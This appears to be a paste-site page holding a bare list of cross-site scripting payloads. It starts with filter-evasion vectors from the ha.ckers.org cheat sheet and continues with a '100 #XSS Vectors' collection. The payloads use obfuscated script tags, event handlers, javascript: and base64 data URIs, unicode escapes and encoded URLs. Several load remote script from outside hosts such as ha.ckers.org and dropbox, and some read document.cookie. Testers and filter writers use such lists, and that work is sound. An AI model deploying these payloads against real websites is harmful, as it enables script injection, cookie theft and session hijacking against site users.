- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <A HREF="http://66.102.7.147/">XSS</A>
- <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
- <A HREF="http://1113982867/">XSS</A>
- <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
- <A HREF="http://0102.0146.0007.00000223/">XSS</A>
- <A HREF="h
- tt p://6	6.000146.0x7.147/">XSS</A>
- <A HREF="//www.google.com/">XSS</A>
- <A HREF="//google">XSS</A>
- <A HREF="http://ha.ckers.org@google">XSS</A>
- <A HREF="http://google:ha.ckers.org">XSS</A>
- <A HREF="http://google.com/">XSS</A>
- <A HREF="http://www.google.com./">XSS</A>
- <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
- <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
- ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉
- 100 #XSS Vectors by @soaj1664ashar
- <iframe src="	javascript:prompt(1)	">
- <svg><style>{font-family:'<iframe/onload=confirm(1)>'
- <input/onmouseover="javaSCRIPT:confirm(1)"
- <sVg><scRipt >alert(1) {Opera}
- <img/src=`` onerror=this.onerror=confirm
- <form><isindex formaction="javascript:confirm(1)"
- <img src=``
 onerror=alert(1)

- <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
- <ScRipT 5-0*3=>prompt(1)</ScRipT giveanswerhere=?
- <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
- <script /**/>/**/alert(1)/**/</script /**/
- "><h1/onmouseover='\u0061lert(1)'>
- <iframe/src="data:text/html,<svg onload=alert(1)>">
- <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
- <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
- <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
- <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
- <iframe src=javascript:alert(document.location)>
- <form><a href="javascript:\u0061lert(1)">X
- </script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
- <img/	  src=`~` onerror=prompt(1)>
- <form><iframe 	  src="javascript:alert(1)" 	;>
- <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
- http://www.google<script .com>alert(document.location)</script
- <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
- <img/src=@  onerror = prompt('1')
- <style/onload=prompt('XSS')
- <script ^__^>alert(String.fromCharCode(49))</script ^__^
- </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
- �</form><input type="date" onfocus="alert(1)">
- <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
- <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
- <iframe srcdoc='<body onload=prompt(1)>'>
- <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
- <script ~~~>alert(0%0)</script ~~~>
- <style/onload=<!--	> alert (1)>
- <///style///><span %2F onmousemove='alert(1)'>SPAN
- <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
- "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
- <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
- <marquee onstart='javascript:alert(1)'>^__^
- <div/style="width:expression(confirm(1))">X</div> {IE7}
- <iframe// src=javaSCRIPT:alert(1)
- //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
- /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/>
- //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
- </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
- <a/href="javascript: javascript:prompt(1)"><input type="X">
- </plaintext\></|\><plaintext/onmouseover=prompt(1)
- </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
- <a href="javascript:\u0061le%72t(1)"><button>
- <div onmouseover='alert(1)'>DIV</div>
- <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
- <a href="jAvAsCrIpT:alert(1)">X</a>
- <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- <var onmouseover="prompt(1)">On Mouse Over</var>
- <a href=javascript:alert(document.cookie)>Click Here</a>
- <img src="/" =_=" title="onerror='prompt(1)'">
- <%<!--'%><script>alert(1);</script -->
- <script src="data:text/javascript,alert(1)"></script>
- <iframe/src \/\/onload = prompt(1)
- <iframe/onreadystatechange=alert(1)
- <svg/onload=alert(1)
- <input value=<><iframe/src=javascript:confirm(1)
- <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
- http://www.<script>alert(1)</script .com
- <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
- <svg><script ?>alert(1)
- <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
- <img src=`xx:xx`onerror=alert(1)>
- <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
- <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
- <math><a xlink:href="//jsfiddle.net/t846h/">click
- <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
- <svg contentScriptType=text/vbs><script>MsgBox
- <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
- <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE>
- <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U
- <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
- <object data=javascript:\u0061le%72t(1)>
- <script>++1-+橗(1)</script>
- <body/onload=<!-->
alert(1)>
- <script itworksinallbrowsers>/*<script* */alert(1)</script
- <img src ?itworksonchrome?\/onerror = alert(1)
- <svg><script>//
confirm(1);</script </svg>
- <svg><script onlypossibleinopera:-)> alert(1)
- <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- <script x> alert</script 1=2
- <div/onmouseover='alert(1)'> style="x:">
- <--`<img/src=` onerror=alert(1)> --!>
- <script/src=data:text/javascript,alert(1)></script>
- <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
- "><img src=x onerror=window.open('https://www.google.com/');>
- <form><button formaction=javascript:alert(1)>CLICKME
- <math><a xlink:href="//jsfiddle.net/t846h/">click
- <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object>
- <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
- 1<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
Add Comment
Please, Sign In to add comment